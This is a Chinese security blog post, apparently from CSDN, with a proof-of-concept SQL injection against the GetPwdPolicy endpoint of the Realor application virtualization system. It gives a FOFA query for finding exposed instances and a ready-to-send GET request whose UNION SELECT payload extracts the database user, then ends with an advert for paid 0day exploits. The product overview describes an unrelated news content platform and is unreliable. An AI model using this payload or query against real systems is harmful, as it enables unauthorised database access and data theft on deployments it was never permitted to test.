0x01 阅读须知(免责声明)
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!本工具或文章或来源于网络,若有侵权请联系作者删除,自行查验是否具有后门,切勿相信软件内的广告!
0x02 产品概述
瑞友天翼应用虚拟化系统 GetPwdPolicy SQL注入漏洞这是一个集内容管理与发布于一体的智能平台,广泛服务于新闻媒体及内容创作行业。平台支持多端协同和多渠道分发,拥有素材管理、内容编辑、智能审核等核心功能,并通过技术辅助创作与数据分析,显著提升内容生产效率与传播质量。从内容采集到发布实现全流程覆盖,优化工作流程,提高传播的精准度和时效性,帮助用户在数字化内容生态中实现高效协作与影响力扩展。
0x03 漏洞描述
该漏洞是一种针对Web站点的网络安全隐患,允许攻击者在受影响系统上执行恶意命令,可能造成严重的安全威胁。此类漏洞通常出现在未严格实施强密码策略或未完善接口鉴权机制的系统中,极易被攻击者利用,导致数据泄露、账户信息被盗等问题,甚至进一步危及系统的整体安全性。攻击者可以通过该漏洞窃取敏感信息、篡改数据或破坏系统的正常运行,对用户隐私和业务安全构成重大威胁。因此,建议管理员尽快修复此漏洞,及时下载并安装官方发布的最新补丁包,同时加强接口鉴权机制,实施强密码策略,定期进行安全检查,以有效提升系统的防护能力,防止潜在风险进一步扩大。
fofa
app="REALOR-天翼应用虚拟化系统"
0x04 POC利用
GET /RAPAgent.XGI?CMD=GetPwdPolicy&User=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x7e%2C%28SELECT+user()%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+- HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
0x05 需要0day漏洞欢迎订阅我们 (订阅专属0day)
如果你想获取更多0day1day漏洞欢迎订阅我们CSDN付费专栏,一次订阅即可享受后续文章的全部更新,打码截图POC都在付费专栏里面,前100名仅需19.9元早订阅早享受享折扣(每周一至周五更新1day/0day漏洞)
订阅专栏后即可解锁全部文章POC,并且享受后续1day0day漏洞POC的更新
每个文章都有详细且完整的WriteUP(例如如下图所示:)
使用技巧:点击链接扫描订阅后快速搜索想要的文章
标签:2CNULL%,订阅,zh,天翼,GetPwdPolicy,漏洞,瑞友,文章,POC From: https://blog.csdn.net/ZeroDay001/article/details/145041019